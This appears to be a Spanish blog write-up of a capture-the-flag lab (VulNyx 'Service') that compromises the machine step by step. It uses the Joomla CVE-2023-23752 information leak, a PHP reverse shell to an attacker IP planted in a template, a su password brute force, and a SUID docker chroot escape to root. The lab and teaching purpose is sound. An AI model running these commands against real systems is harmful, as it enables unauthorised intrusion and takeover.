cd ~/blog

~/writeups/vulnyx/16-service.md

16 - Service

easy Linux vulnyx 14-02-2025
Joomla 4.2.8 Unauthenticated Information Disclosure (CVE-2023-23752)Template edit RCEsu brute forceSUID docker Privesc
vulnyx.com

~1 min de lectura


Enumeramos puertos y directorios:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.56
 nmap -sCV -p 22,80,8080 -oN 02-targeted.txt 192.168.1.56
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-14 15:15 -03
Nmap scan report for 192.168.1.56
Host is up (0.00030s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp   open  http    nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Welcome to nginx!
8080/tcp open  http    Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/
| /cache/ /cli/ /components/ /includes/ /installation/
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Welcome to nginx!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds
 gobuster dir -u 'http://192.168.1.56:8080' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,sql,png,xml,zip,sh,db -r
...
/index.php            (Status: 200) [Size: 614]
/images               (Status: 200) [Size: 31]
/home                 (Status: 200) [Size: 614]
/media                (Status: 200) [Size: 31]
/templates            (Status: 200) [Size: 31]
/modules              (Status: 200) [Size: 31]
/plugins              (Status: 200) [Size: 31]
/includes             (Status: 200) [Size: 31]
/language             (Status: 200) [Size: 31]
/README.txt           (Status: 200) [Size: 4942]
/components           (Status: 200) [Size: 31]
/api                  (Status: 406) [Size: 29]
/cache                (Status: 200) [Size: 31]
/libraries            (Status: 403) [Size: 279]
/robots.txt           (Status: 200) [Size: 764]
/tmp                  (Status: 200) [Size: 31]
/LICENSE.txt          (Status: 200) [Size: 18092]
/layouts              (Status: 200) [Size: 31]
/administrator        (Status: 200) [Size: 12277]
...

El README.txt revela que corre Joomla 4.2, vulnerable a una divulgación de información no autenticada (CVE-2023-23752). Lanzamos el exploit, que filtra las credenciales del administrador y de la base de datos:

 searchsploit joomla 4.2
...
Joomla! v4.2.8 - Unauthenticated information disclosure | php/webapps/51334.py
...

 ./51334.rb http://192.168.1.56:8080
Users
[853] administrator (admin) - admin@mail.nyx - Super Users

Site info
Site name: Joomla
Editor: tinymce
Captcha: 0
Access: 1
Debug status: false

Database info
DB type: mysqli
DB host: mysql
DB user: root
DB password: j00mL@123###
DB name: joomla_db
DB prefix: o574c_
DB encryption 0

Iniciamos sesión en /administrator/ con admin:j00mL@123###, editamos el index.php de una plantilla añadiendo una reverse shell y la disparamos:

<?php
    shell_exec("bash -c 'bash -i >& /dev/tcp/192.168.1.7/1234 0>&1'");
?>

 ncat -nlvp 1234
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.56:33162.
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@640aa6d0dea4:/var/www/html$

El hostname y el sistema de archivos indican que estamos dentro de un contenedor Docker. Para escalar dentro del contenedor, hacemos fuerza bruta sobre la contraseña de root con su-bruteforce:

www-data@640aa6d0dea4:/tmp$ ./suBF.sh -u root -t 0.7 -s 0.05
  [+] Bruteforcing root...
  You can login as root using password: fucker

www-data@640aa6d0dea4:/var/www/html$ su root
su root
Password: fucker
root@640aa6d0dea4:/var/www/html#

Dentro del contenedor obtenemos la clave id_rsa del usuario joel, con la que accedemos al host real y obtenemos la primera flag:

 ssh joel@192.168.1.56 -i id_rsa_joel
joel@service:~$

Para escalar privilegios en el host, buscamos binarios SUID y encontramos docker:

joel@service:/tmp$ find / -perm -4000 2>/dev/null
...
/usr/bin/docker
...

Con docker SUID, montamos el sistema de archivos del host en un contenedor y obtenemos root:

joel@service:/tmp$ docker run -v /:/mnt --rm -it alpine chroot /mnt bash
root@c0dbbef5307a:/#

Obtenemos la flag y fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados